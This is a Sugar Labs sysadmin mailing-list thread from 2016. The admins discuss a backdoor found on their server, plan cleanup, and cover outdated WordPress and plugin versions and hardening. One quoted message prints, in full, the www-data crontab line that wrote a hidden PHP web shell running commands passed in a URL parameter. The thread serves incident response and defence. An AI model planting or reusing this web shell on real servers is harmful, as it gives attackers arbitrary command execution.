[Systems] Found a backdoor
Samuel Cantero
scanterog at gmail.com
Tue Mar 1 20:55:00 EST 2016
If you want to keep it and I can do the job. I will try to do it this
weekend.
Best regards,
Samuel C.
On Tue, Mar 1, 2016 at 10:49 PM, Walter Bender <walter.bender at gmail.com>
wrote:
> Let's shut it down for the time being. I've been updating the wiki but not
> my blog since the attack last year anyway.
>
> -walter
>
> On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org>
> wrote:
>
>> +walter
>>
>> Can we appoint an official maintainer for walterbender.org? Sorry for
>> not stepping up myself, but I'm overwhelmed by work related things and
>> trying to reduce my sysadmin load.
>>
>> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
>> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
>> > <mailto:bernie at codewiz.org>> wrote:
>> >
>> > On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>> > > Remember in June we had an incident with a broken Wordpress site.
>> > > I switched to static generator since then.
>> > >
>> > > +1 on containers just learning more about them and finding them
>> fascinating.
>> > > Count me in on containerizing everything.
>> > >
>> > > I'm not aware of other wordpress sites. Maybe walter's blog?
>> > > Wordpress is a PIA IMHO.
>> >
>> > Yes, WP is riddled with security holes. Back in October, Samuel
>> helped
>> > Walter upgrade walterbender.org <http://walterbender.org> on
>> > sunjammer. Samuel, can you confirm
>> > that the WP instance now fully patched and locked down?
>> >
>> >
>> > The WP version on walterbender.org <http://walterbender.org> site is
>> > 4.3.1. The WP last version is 4.4.2. I have checked the WP change log
>> > and we can find this:
>> >
>> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
>> > scripting vulnerability that could allow a site to be compromised.
>> >
>> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
>> > security issues: a possible SSRF for certain local URIs, and an open
>> > redirection attack.
>> >
>> > This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
>> > Significant information on the release notes:
>> >
>> > * Pre-emptive security improvements to ensure that the Akismet plugin
>> > can't be used by attackers to compromise a WordPress installation.
>> > * Closes a potential XSS vulnerability.
>> >
>> > Of course, every version has a lot of bug fixes. We definitely should
>> > upgrade it and test nothing breaks walterbender.org
>> > <http://walterbender.org> site.
>> >
>> > Who is in charge of upgrading the others WP sites?
>> >
>> > Regards,
>> >
>> > Samuel C.
>> >
>> >
>> >
>> >
>> > > Regards,
>> > > Sebastian
>> > >
>> > >
>> > > On 25/02/16 04:47, Bernie Innocenti wrote:
>> > >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i
>> > found
>> > >> that www-data was executing commands like these:
>> > >>
>> > >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6)
>> ==
>> > >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
>> > >> @system($time); exit; } ?>' >
>> /srv/www-somosazucar/blog/.cache.php
>> > >>
>> > >> Did you spot the system()? This executes arbitrary commands
>> specified
>> > >> via the "localtime" url parameter. Uh-oh.
>> > >>
>> > >> There were about a dozen lines like the above, installing
>> > .cache.php in
>> > >> various virtualhosts. I kept a copy of the file in
>> > >> /root/www-data.backdoor. The file was last written on Jun 23
>> 2015,
>> > >> which may correlate with the switch to the new website.
>> > >>
>> > >> I cleared the mess and searched the logs for requests containing
>> > >> "localtime", but couldn't find any. I wonder if they could
>> filter the
>> > >> logs, since they were previously writable by www-data.
>> > >>
>> > >> Please watch out. We should ensure directories accessible over
>> > http are
>> > >> not writable by user www-data, especially those in which PHP and
>> CGIs
>> > >> are enabled.
>> > >>
>> > >> Running several large sites under the same uid has always been a
>> bad
>> > >> security practice, and looking forward we should keep migrating
>> > them to
>> > >> properly isolated containers.
>> > >>
>> > >> Finally, Wordpress is particularly dangerous and we should
>> update and
>> > >> harden all instances. Can someone please take care of this? I'll
>> do
>> > >> Mediawiki, which I know pretty well.
>> > >>
>> > >
>> >
>> >
>> > --
>> > _ // Bernie Innocenti
>> > \X/ http://codewiz.org
>> > _______________________________________________
>> > Systems mailing list
>> > Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>> > http://lists.sugarlabs.org/listinfo/systems
>> >
>> >
>> >
>> >
>> > _______________________________________________
>> > Systems mailing list
>> > Systems at lists.sugarlabs.org
>> > http://lists.sugarlabs.org/listinfo/systems
>> >
>>
>>
>> --
>> _ // Bernie Innocenti
>> \X/ http://codewiz.org
>>
>
>
>
> --
> Walter Bender
> Sugar Labs
> http://www.sugarlabs.org
> <http://www.sugarlabs.org>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.sugarlabs.org/archive/systems/attachments/20160301/fa3a11c0/attachment.html>
More information about the Systems
mailing list